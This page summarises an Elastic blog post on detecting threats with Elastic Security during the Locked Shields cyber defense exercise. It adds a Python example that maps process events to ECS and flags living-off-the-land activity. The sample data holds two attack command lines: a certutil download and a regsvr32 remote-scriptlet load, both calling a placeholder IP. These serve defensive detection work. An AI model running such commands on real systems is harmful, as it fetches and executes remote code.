
How Elastic Security is used in Locked Shields, one of the world's largest cyber defense exercises (part 2)

Blog post from Elastic

Post details

Author: Marvin Ngoma
Word count: 3,240
Summary

Locked Shields, one of the largest cyber defense exercises, provides a realistic simulation of cyber warfare through a series of attack scenarios against the fictitious country of Berylia. The post describes how Elastic Security, including the SIEM and Endpoint Security components, is used to detect and prevent threats during the exercise. Participating teams apply a "left and right of boom" approach, working on prevention before an incident and on response after it. Elastic's setup for the exercise covers data collection, normalization into the Elastic Common Schema (ECS), and integration with tools such as Osquery for investigation and response. The post walks through common tactics seen in the exercise, notably defense evasion and "living off the land" techniques, and maps realistic attack chains to the MITRE ATT&CK framework. Locked Shields underscores the importance of basic security hygiene, collaboration between teams, and the human factor in cyber defense, while showing how Elastic Security can be used to disrupt complex attacks.
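The summary above mentions two pieces of the described setup without showing either: normalizing collected events into ECS field names, and detecting "living off the land" activity mapped to MITRE ATT&CK. The following is an added example written for this page, not code from Elastic or from the post. It takes a few constructed process-start records in an osquery-style row shape (column names such as `hostname`, `cmdline` and `parent_name` are assumed for illustration), maps them onto real ECS field names, and runs a small set of signed-binary-abuse rules over the normalized events. The rule list and the `SAMPLE_ROWS` data are constructed for the example.

```python
"""Added example (not Elastic's code): normalize process events into ECS
field names and flag common living-off-the-land (LotL) command lines."""
from __future__ import annotations

from datetime import datetime, timezone
from typing import Any

# Constructed sample records. The column names follow an osquery-like
# process table but are an assumption for this example, not a real schema.
SAMPLE_ROWS: list[dict[str, Any]] = [
    {"hostname": "ws01.berylia.example", "username": "jdoe", "pid": 4120,
     "name": "certutil.exe", "path": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/a.txt a.txt",
     "parent_name": "cmd.exe", "time": 1700000000},
    {"hostname": "ws01.berylia.example", "username": "jdoe", "pid": 4133,
     "name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt",
     "parent_name": "explorer.exe", "time": 1700000005},
    {"hostname": "srv02.berylia.example", "username": "svc_backup", "pid": 991,
     "name": "regsvr32.exe", "path": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.7/t.sct scrobj.dll",
     "parent_name": "wscript.exe", "time": 1700000010},
]

# (rule title, ATT&CK technique id, ATT&CK technique name, binary, required
# lower-cased substrings that must all appear in the command line)
LOTL_RULES = [
    ("certutil used to download a file", "T1105", "Ingress Tool Transfer",
     "certutil.exe", ("-urlcache", "http")),
    ("regsvr32 loading a remote scriptlet", "T1218.010",
     "System Binary Proxy Execution: Regsvr32",
     "regsvr32.exe", ("scrobj.dll", "/i:http")),
]


def to_ecs(row: dict[str, Any]) -> dict[str, Any]:
    """Map the assumed raw columns onto ECS field names (dotted keys).

    Names are lower-cased so rules do not miss CertUtil.EXE vs certutil.exe.
    """
    return {
        "@timestamp": datetime.fromtimestamp(row["time"], tz=timezone.utc).isoformat(),
        "event.kind": "event",
        "event.category": ["process"],
        "event.type": ["start"],
        "host.name": row["hostname"],
        "user.name": row["username"],
        "process.pid": row["pid"],
        "process.name": row["name"].lower(),
        "process.executable": row["path"],
        "process.command_line": row["cmdline"],
        "process.parent.name": row["parent_name"].lower(),
    }


def match_lotl(event: dict[str, Any]) -> list[dict[str, Any]]:
    """Return one alert per LotL rule that matches the normalized event.

    Each alert carries the event's host/user/process context plus the ECS
    threat.* fields so it can be pivoted on by technique in a SIEM.
    """
    cmd = event["process.command_line"].lower()
    alerts = []
    for title, tech_id, tech_name, binary, needles in LOTL_RULES:
        if event["process.name"] == binary and all(n in cmd for n in needles):
            alerts.append({
                **event,
                "rule.name": title,
                "threat.framework": "MITRE ATT&CK",
                "threat.technique.id": tech_id,
                "threat.technique.name": tech_name,
            })
    return alerts


def detect(rows: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Normalize every raw row, then evaluate the LotL rules over each."""
    alerts: list[dict[str, Any]] = []
    for row in rows:
        alerts.extend(match_lotl(to_ecs(row)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_ROWS):
        print(alert["host.name"], alert["threat.technique.id"], alert["rule.name"])
```

The point of normalizing first is that the rules only ever see `process.name` and `process.command_line`, so the same two rules apply unchanged whether the underlying record came from an endpoint agent, Osquery, or a Windows event log. Substring rules of this kind are deliberately simple; in practice they are a starting point that the exercise's defense-evasion cases (renamed binaries, obfuscated arguments) will quickly push toward parent-process and behavioural context.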